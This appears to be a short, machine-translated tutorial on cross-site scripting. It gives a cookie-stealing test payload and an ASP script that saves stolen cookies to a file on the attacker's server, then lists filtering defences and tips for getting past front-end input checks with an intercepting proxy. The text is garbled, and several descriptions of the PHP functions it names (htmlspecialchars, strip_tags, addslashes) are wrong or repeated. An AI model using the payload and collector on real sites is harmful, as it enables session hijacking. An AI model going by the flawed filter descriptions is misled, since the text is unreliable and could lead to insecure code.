Description: A malicious attacker to insert malicious Web page using Script code, when a user browses pages, embedded therein Script code is executed, so as to achieve the purpose of malicious users.
Trigger: occurs in the destination site on the target user's browser level
Common: public message boards, publicly visible text
Test Methods:
(1) cookies elastic block
<script>alert(document.cookie)</script>
(2) cookies gets written to the attacker's folder
< HTML > < title > xx </ title > < body > <% testfile = Server.MapPath ( " code.txt " ) // first construct a path that is taking root of the site, create a code in the root directory .txt path stored in the testfile msg = Request ( " msg " ) // get the msg variable submitted over, that is, the cookie value the SET fs = server.CreateObject ( " Scripting.FileSystemObject " ) // create a fs target the SET thisFile =fs.OpenTextFile (testfile, . 8 , True , 0 ) thisfile.WriteLine ( "" & MSG & "" ) // image acquired code.txt written to the Cookie thisfile.close () // Close SET FS = Nothing % > </ body > </ HTML >
Approach:
Filter technology employed, all parameters are filtered by the processing program: 1 escaped with a special character [& it;, & gt;, & quot]. 2. containing sensitive html scripts directly disposed of.
Common XSS filtering:
1.htmlspecialchars () function
capable of single quotation marks '', double quotation marks "", slash / backslash \ escape, i.e. prior to adding back these symbols signifier \.
However, the default encoding function double quotes, forward slash (/ \)
if you want to encode a single quote, you need to add a parameter
2.strip_tags function of
the angle brackets coding
3.addslashes
the transfer of single and double quotation marks is the 'preceded by a \
4.addslashes () function
predefined character ' "\ NULL
function before the four characters plus \
5. I have seen during the penetration testing is basically the key symbol is as <> '' '' (), etc.
These entities encoded symbols
or symbols directly filtered off
then the keywords or alert script src img etc. filter out
some time will pass front-end JS check, limit the length of the input string, you can not build a complete statement of XSS
, but you look at the page elements, find the corresponding codes, which can be modified to limit
or to enter a legitimate string, and then use brupsuit capture changes